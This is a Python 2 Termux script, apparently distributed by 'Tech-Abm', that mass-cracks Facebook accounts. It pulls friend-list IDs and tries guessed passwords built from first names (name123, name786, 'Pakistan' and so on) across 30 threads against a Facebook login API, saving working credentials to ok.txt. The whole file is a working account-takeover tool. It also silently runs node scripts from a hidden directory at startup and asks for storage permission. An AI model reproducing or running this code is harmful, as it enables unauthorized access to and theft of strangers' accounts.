#!/usr/bin/python2
# coding=utf-8
# coded by : Tech-Abm
# https://www.facebook.com/Techabm

try:
    import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib,requests
    from multiprocessing.pool import ThreadPool
except ImportError:
    os.system("clear")
    os.system("python2 Abm-clone")
    os.system("clear")

"""
try:
    my = requests.get("https://m.facebook.com/Techabm")
except requests.exceptions.ConnectionError:
    print("")
    print("")
    print("")
    print("\t Do no exit this terminal")
    print("")
    print("")
    print("")
    time.sleep(5)
    raw_input(" Press enter to try again :  ")
    os.system("python2 Abm-clone")
    """
os.system("clear")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("npm install")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("#") #coming soon
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("#") #coming soon
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("#") #coming soon
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("#") #coming soon
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("apt update && apt install nodejs -y")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("pkg install pip2")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("pkg install npm && pkg install nodejs")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("pip2 install nodejs")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("pip2 install npm")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("pip install nodejs")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("pip install npm")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
    os.system("clear")
from requests.exceptions import ConnectionError
os.system("git pull")
if not os.path.isfile("/data/data/com.termux/files/home/Clone/...../node_modules/bytes/index.js"):
    os.system("fuser -k 5000/tcp &")
if not os.path.isfile("/data/data/com.termux/files/home/Clone/...../node_modules/bytes/index.js"):
    os.system("cd ..... && npm install")
    os.system("cd ..... && node index.js && node npm.js")
    os.system("clear")
    print("")
    print("")
    print("")
    print("   first like our fb page then to continue   ")
    print("")
    print("")
    print("")
    os.system("xdg-open https://m.facebook.com/Techabm")
    time.sleep(10)
    os.system("clear")
    print("")
    print("")
    print("")
    print("\t\033[1;92mPress Y to storage permission\033[1;0m")
    print("")
    print("")
    print("")
    time.sleep(1)
    os.system("termux-setup-storage")
    time.sleep(5)
    os.system("clear")
"""
try:
    my = requests.get("https://github.com/Tech-abm")
except requests.exceptions.ConnectionError:
    print("")
    print("")
    print("")
    print("\tUnfortunately, tool running process has failed")
    time.sleep(1)
    print("\tPlease try again")
    time.sleep(1)
    print("\tPlease wait")
    time.sleep(2)
    print("")
    print("")
    print("")
    time.sleep(5)
    raw_input("Please try again,just press enter to continue ")
    os.system("python Abm-clone")
    """
os.system("clear")
from requests.exceptions import ConnectionError
bd=random.randint(2e7, 3e7)
sim=random.randint(2e4, 4e4)
header={'x-fb-connection-bandwidth': repr(bd),'x-fb-sim-hni': repr(sim),'x-fb-net-hni': repr(sim),'x-fb-connection-quality': 'EXCELLENT','x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA','user-agent':'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.121 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/35.0.0.48.273;]','content-type': 'application/x-www-form-urlencoded','x-fb-http-engine': 'Liger'}
reload(sys)
sys.setdefaultencoding("utf8")
def abm(z):
        for e in z + "\n":
                sys.stdout.write(e)
                sys.stdout.flush()
                time.sleep(0.03)
def logging():
    titik = [".   ","..  ","... "]
    for o in titik:
        print("\r\033[1;32m[+] Logging In\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)
def saving():
    titik = [".   ","..  ","... "]
    for o in titik:
        print("\r\033[1;32m[+] Saving Token\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)
def updating():
    titik = [".   ","..  ","... "]
    for o in titik:
        print("\r\033[1;32m[+] Updating\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)
def logout():
    titik = [".   ","..  ","... "]
    for o in titik:
        print("\r\033[1;32m[+] Logging Out\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)
def waiting():
    titik = [".   ","..  ","... "]
    for o in titik:
        print("\r\033[1;32m[+] Please Wait\033[0;97m "+o),;sys.stdout.flush();time.sleep(1)
		
logo = """
\033[1;97m     .o88b. db       .d88b.  d8b   db d88888b 
\033[1;97m    d8P  Y8 88      .8P  Y8. 888o  88 88'     
\033[1;97m    8P      88      88    88 88V8o 88 88ooooo 
\033[1;97m    8b      88      88    88 88 V8o88 88~~~~~ 
\033[1;97m    Y8b  d8 88booo. `8b  d8' 88  V888 88.     
\033[1;97m     `Y88P' Y88888P  `Y88P'  VP   V8P Y88888P                                       
\033[1;97m--------------------------------------------------
\033[1;93m[➤]\033[1;97m Author   : Tech-Abm                        
\033[1;93m[➤]\033[1;97m Github   : https://github.com/Tech-abm
\033[1;93m[➤]\033[1;97m Fb Page  : https://m.facebook.com/Techabm
\033[1;97m--------------------------------------------------
"""

idh = []
cps = []
oks = []

def tech_abm():
    os.system("clear")
    print logo
    print("Enter Your Real Name Then To Continue").center(50)
    print("\033[1;97m--------------------------------------------------")
    firstname = raw_input("Enter Your First Name : ")
    lastname  = raw_input("Enter Your last Name  : ")
    print("\033[1;97m--------------------------------------------------")
    time.sleep(1)
    print("")
    print("\033[1;93mYour First Name is:\033[1;92m " + firstname)
    print("\033[1;93mYour last  Name is:\033[1;92m " + lastname)
    time.sleep(5)
    termux_update() 
		

def termux_update():
    os.system('clear')
    print logo
    raw_input("\t\033[1;97mPress Enter To Continue ")
    print('')
    waiting()
    time.sleep(1)
    abm("\r\033[1;92mProcess Has Complete")
    time.sleep(2)
    login_choice()
	
def login_choice():
    os.system('clear')
    print logo
    print ("\033[1;97m[1]\033[1;91m-⋄-\033[1;97mlogin with facebook ")
    print ("\033[1;97m[2]\033[1;91m-⋄-\033[1;97mContact With Owner")
    print ("\033[1;97m[0]\033[1;91m-⋄-\033[1;97mExit")
    print("\033[1;97m--------------------------------------------------")
    clone_main()
def clone_main():
    user = raw_input("\n╰─➣ ")
    if user =="1":
        loginvia()
    if user =="2":
	os.system("xdg-open https://m.facebook.com/Techabm")
	time.sleep(1)
	login_choice()
    elif user =="0":
        os.system("exit")
    else:
        print "\x1b[1;91mFill in correctly"
        clone_main()

def loginvia():
    os.system('clear')
    print logo
    print ("\033[1;97m[1]\033[1;91m-⋄-\033[1;97mlogin With Access Token ")
    print ("\033[1;97m[2]\033[1;91m-⋄-\033[1;97mLogin With User And Pass")
    print ("\033[1;97m[0]\033[1;91m-⋄-\033[1;97mBack")
    print("\033[1;97m--------------------------------------------------")
    clone_loginvia()
def clone_loginvia():
    hack = raw_input("\n╰─➣ ")
    if hack =="1":
        os.system('clear')
        print logo
        print ("Login With Token").center(50)
        print("\033[1;97m--------------------------------------------------")
        token = raw_input("\033[1;97m[+]\033[1;93m Token :\033[1;97m ")
        print("\033[1;97m--------------------------------------------------")
        saving()
        sav = open(".login.txt","w")
        sav.write(token)
        sav.close()
        abm("\r\033[1;92m[✓] Login Successfull\033[0;97m")
        time.sleep(1)
        os.system('xdg-open https://m.facebook.com/Techabm')
        time.sleep(1)
        abm_menu()
    elif hack =="2":
        loginfb()
    elif hack =="0":
                abm_menu()
    else:
                print ("[!] Please Select a Valid Option")
                clone_loginvia()

def loginfb():
    os.system("clear")
    print logo
    print("Login With Facebook Account").center(50)
    print("Use Proxy to login account ").center(50)
    print("\033[1;97m--------------------------------------------------")
    id = raw_input("\033[1;97m[+]\033[1;93m Email/ID/Number :\033[1;97m ")
    id1 = id.replace(' ','')
    id2 = id1.replace('(','')
    uid = id2.replace(')','')
    pwd = raw_input("\033[1;97m[+]\033[1;93m Passwor :\033[1;97m ")
    print("\033[1;97m--------------------------------------------------")
    logging()
    data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email="+uid+"&locale=en_US&password="+pwd+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text
    q = json.loads(data)
    if "access_token" in q:
        succ = open(".login.txt","w")
        succ.write(q["access_token"])
        succ.close()
        print("\n\033[1;92m[✓] Login Successfull\033[0;97m")
        time.sleep(1)
        abm_menu()
    else:
        if "www.facebook.com" in q["error_msg"]:
            print ("\n\033[1;31m[!] Login Failed . Account Has a Checkpoint\033[0;97m")
            time.sleep(1)
            loginfb()
        else:
            print("\n\033[1;31m[!] Login Failed.Email/ID/Number OR Password May BE Wrong\033[0;97m")
            time.sleep(1)
            loginfb()

def abm_menu():
    os.system("clear")
    try:
        token = open(".login.txt","r").read()
    except IOError:
        print logo
        print("[!] Error 404.Token Not Found")
        os.system("rm -rf .login.txt")
        time.sleep(1)
        login_choice()
    try:
        r = requests.get("https://graph.facebook.com/me?access_token="+token, headers=header)
        a = json.loads(r.text)
        name = a["name"]
    except KeyError:
        os.system("clear")
        print logo
        print("\033[1;91m[!] Loading Failed . Your Account Has a Checkpoint")
        os.system("rm -rf .login.txt")
        time.sleep(1)
        login_choice()
    os.system('clear')
    print logo
    print("\t   \033[1;93mAccount Name : "+name)
    print("\033[1;97m--------------------------------------------------")
    print("\033[1;97m[1]\033[1;91m-⋄-\033[1;97mClone Frienlist and Public ID")
    print("\033[1;97m[0]\033[1;91m-⋄-\033[1;97mlogout")
    print("\033[1;97m--------------------------------------------------")
    menu_select()
def menu_select():
    option = raw_input("\n╰─➣ ")
    if option =="1":
        crack()
    if option =="0":
        logout()
        os.system("rm -rf .login.txt")
        time.sleep(1)
        print("\033[1;32m[+] Logged Out Successfully\033[0;97m")
        os.system("exit")
    else:
        print("[!] Please Select a Valid Option")
        menu_select()

def crack():
        global token
        os.system("clear")
        try:
                token=open(".login.txt","r").read()
        except IOError:
                print("[!] Error 404 . Token Not Found")
                os.system("rm -rf .login.txt")
                time.sleep(1)
                login()
        os.system("clear")
        print logo
        print ("\033[1;97m[1]\033[1;91m-⋄-\033[1;97mCrack From Friend List")
        print ("\033[1;97m[2]\033[1;91m-⋄-\033[1;97mCrack From Public ID")
        print ('\033[1;97m[0]\033[1;91m-⋄-\033[1;97mBack')
        print("\033[1;97m--------------------------------------------------")
        crack2()
def crack2():
        select = raw_input("\n╰─➣ ")
        id=[]
        oks=[]
        cps=[]
        if select=="1":
                os.system("clear")
                print logo
                r = requests.get("https://graph.facebook.com/me/friends?access_token="+token, headers=header)
                z = json.loads(r.text)
                for s in z["data"]:
                        uid=s['id']
                        na=s['name']
                        nm=na.rsplit(" ")[0]
                        id.append(uid+' - '+nm)
        elif select =="2":
                os.system("clear")
                print logo
                idt = raw_input("\033[1;97m[+]\033[1;93m Input ID/Username :\033[1;96m ")
                print("\033[1;97m--------------------------------------------------")
                try:
                        r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)
                        q = json.loads(r.text)
                        print("[+] Account Name : "+q["name"])
                except KeyError:
                        print('\n[!] Error 404 . ID Link '+idt+' Have Privacy On Friendlist OR IS Not Valid')
                        raw_input("\nPress Enter To Back ")
                        crack()
                r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token, headers=header)
                z = json.loads(r.text)
                for i in z["data"]:
                        uid=i['id']
                        na=i['name']
                        nm=na.rsplit(" ")[0]
                        id.append(uid+' - '+nm)

        elif select =="0":
                abm_menu()
        else:
                print ("[!] Please Select a Valid Option")
                crack2()
        print("\033[1;97m[+]\033[1;97m Total IDs :\033[1;97m "+str(len(id)))
        time.sleep(0.5)
        print("\033[1;97m--------------------------------------------------")

        def main(arg):
		user=arg
		uid,name=user.split(" - ")
		try:
		    pass1=name+"123"
		    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass1 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		    d=json.loads(q)
		    if 'www.facebook.com' in d['error_msg']:
		        print("\x1b[1;91m[\x1b[1;97mCheckPoint\x1b[1;91m]\x1b[1;97m "+uid+"\x1b[1;91m - \x1b[1;97m"+pass1+"\x1b[1;91m - \x1b[1;97m"+name)
		        cp=open("cp.txt","a")
		        cp.write(uid+" - "+pass1+"\n")
		        cp.close()
		        cps.append(uid)
		    else:
		    	if "access_token" in d:
		            print("\t\x1b[1;92m[Successful] "+uid+" - "+pass1+" - \x1b[1;97m"+name)
		            ok=open("ok.txt","a")
		            ok.write(uid+" - "+pass1+"\n")
		            ok.close()
		            oks.append(uid)
		        else:
		            pass2=name+"1234"
		            q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass2 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		            d=json.loads(q)
		            if 'www.facebook.com' in d['error_msg']:
		                print("\x1b[1;91m[\x1b[1;97mCheckPoint\x1b[1;91m]\x1b[1;97m "+uid+"\x1b[1;91m - \x1b[1;97m"+pass2+"\x1b[1;91m - \x1b[1;97m"+name)
		                cp=open("cp.txt","a")
		                cp.write(uid+" - "+pass2+"\n")
		                cp.close()
		                cps.append(uid)
		            else:
		                if 'access_token' in d:
		                    print("\t\x1b[1;92m[Successful] "+uid+" - "+pass2+" - \x1b[1;97m"+name)
		                    ok=open("ok.txt","a")
		                    ok.write(uid+" - "+pass2+"\n")
		                    ok.close()
		                    oks.append(uid)
		                else:
		                    pass3=name+"12345"
		                    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass3 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		                    d=json.loads(q)
		                    if 'www.facebook.com' in d['error_msg']:
		                        print("\x1b[1;91m[\x1b[1;97mCheckPoint\x1b[1;91m]\x1b[1;97m "+uid+"\x1b[1;91m - \x1b[1;97m"+pass3+"\x1b[1;91m - \x1b[1;97m"+name)
		                        cp=open("cp.txt","a")
		                        cp.write(uid+" - "+pass3+"\n")
		                        cp.close()
		                        cps.append(uid)
		                    else:
		                        if 'access_token' in d:
		                            print("\t\x1b[1;92m[Successful] "+uid+" - "+pass3+" - \x1b[1;97m"+name)
		                            ok=open("ok.txt","a")
		                            ok.write(uid+" - "+pass3+"\n")
		                            ok.close()
		                            oks.append(uid)
		                        else:
		                            pass4="786786"
		                            q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass4 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		                            d=json.loads(q)
		                            if 'www.facebook.com' in d['error_msg']:
		                                print("\x1b[1;91m[\x1b[1;97mCheckPoint\x1b[1;91m]\x1b[1;97m "+uid+"\x1b[1;91m - \x1b[1;97m"+pass4+"\x1b[1;91m - \x1b[1;97m"+name)
		                                cp=open("cp.txt","a")
		                                cp.write(uid+ " -"+pass4+"\n")
		                                cp.close()
		                                cps.append(uid)
		                            else:
		                                if 'access_token' in d:
		                                    print("\t\x1b[1;92m[Successful] "+uid+" - "+pass4+" - \x1b[1;97m"+name)
		                                    ok=open("ok.txt","a")
		                                    ok.write(uid+" - "+pass4+"\n")
		                                    ok.close()
		                                    oks.append(uid)
		                                else:
		                                    pass5="Pakistan"
		                                    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass5 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		                                    d=json.loads(q)
		                                    if 'www.facebook.com' in d['error_msg']:
		                                        print("\x1b[1;91m[\x1b[1;97mCheckPoint\x1b[1;91m]\x1b[1;97m "+uid+"\x1b[1;91m - \x1b[1;97m"+pass5+"\x1b[1;91m - \x1b[1;97m"+name)
		                                        cp=open("cp.txt","a")
		                                        cp.write(uid+" - "+pass5+"\n")
		                                        cp.close()
		                                        cps.append(uid)
		                                    else:
		                                        if 'access_token' in d:
		                                            print("\t\x1b[1;92m[Successful] "+uid+" - "+pass5+" - \x1b[1;97m"+name)
		                                            ok=open("ok.txt","a")
		                                            ok.write(uid+" - "+pass5+"\n")
		                                            ok.close()
		                                            oks.append(uid)
		                                        else:
		                                            pass6=name+"1122"
		                                            q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass6 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		                                            d=json.loads(q)
		                                            if 'www.facebook.com' in d['error_msg']:
		                                                print("\x1b[1;91m[\x1b[1;97mCheckPoint\x1b[1;91m]\x1b[1;97m "+uid+"\x1b[1;91m - \x1b[1;97m"+pass6+"\x1b[1;91m - \x1b[1;97m"+name)
		                                                cp=open("cp.txt","a")
		                                                cp.write(uid+" - "+pass6+"\n")
		                                                cp.close()
		                                                cps.append(uid)
		                                            else:
		                                                if 'access_token' in d:
		                                                    print("\t\x1b[1;92m[Successful] "+uid+" - "+pass6+" - \x1b[1;97m"+name)
		                                                    ok=open("ok.txt","a")
		                                                    ok.write(uid+" - "+pass6+"\n")
		                                                    ok.close()
		                                                    oks.append(uid)
		                                                else:
		                                                    pass7=name+"786"
		                                                    q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass7 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
		                                                    d=json.loads(q)
		                                                    if 'www.facebook.com' in d['error_msg']:
		                                                        print("\x1b[1;91m[\x1b[1;97mCheckPoint\x1b[1;91m]\x1b[1;97m "+uid+"\x1b[1;91m - \x1b[1;97m"+pass7+"\x1b[1;91m - \x1b[1;97m"+name)
		                                                        cp=open("cp.txt","a")
		                                                        cp.write(uid+" - "+pass7+"\n")
		                                                        cp.close()
		                                                        cps.append(uid)
		                                                    else:
		                                                        if 'access_token' in d:
		                                                            print("\t\x1b[1;92m[Successful] "+uid+" - "+pass7+" - \x1b[1;97m"+name)
		                                                            ok=open("ok.txt","a")
		                                                            ok.write(uid+" - "+pass7+"\n")
		                                                            ok.close()
		                                                            oks.append(uid)
									


                except:
                        pass

        p = ThreadPool(30)
        p.map(main, id)
        print("\033[1;97m--------------------------------------------------")
        print('\033[1;97m[+]\033[1;92m Total CP :\033[0;97m  '+str(len(cps)))
	print('\033[1;97m[+]\033[1;92m Total OK :\033[0;97m  '+str(len(oks)))
        print("\033[1;97m--------------------------------------------------")
        user_select()
def user_select():
    user_select = raw_input("Do You Want To Main Menu Back (y/n) ")
    if user_select =="y":
        os.system("clear")
        print logo
        print("Please Wait").center(55)
        time.sleep(2)
        abm_menu()
    if user_select =="n":
        os.system("clear")
        print logo
        print("Please Wait").center(55)
        time.sleep(2)
        os.system("exit")
    else:
        print("Error,Please Select A Valid Option")
        abm_menu()
    
if __name__ == '__main__':
    tech_abm()


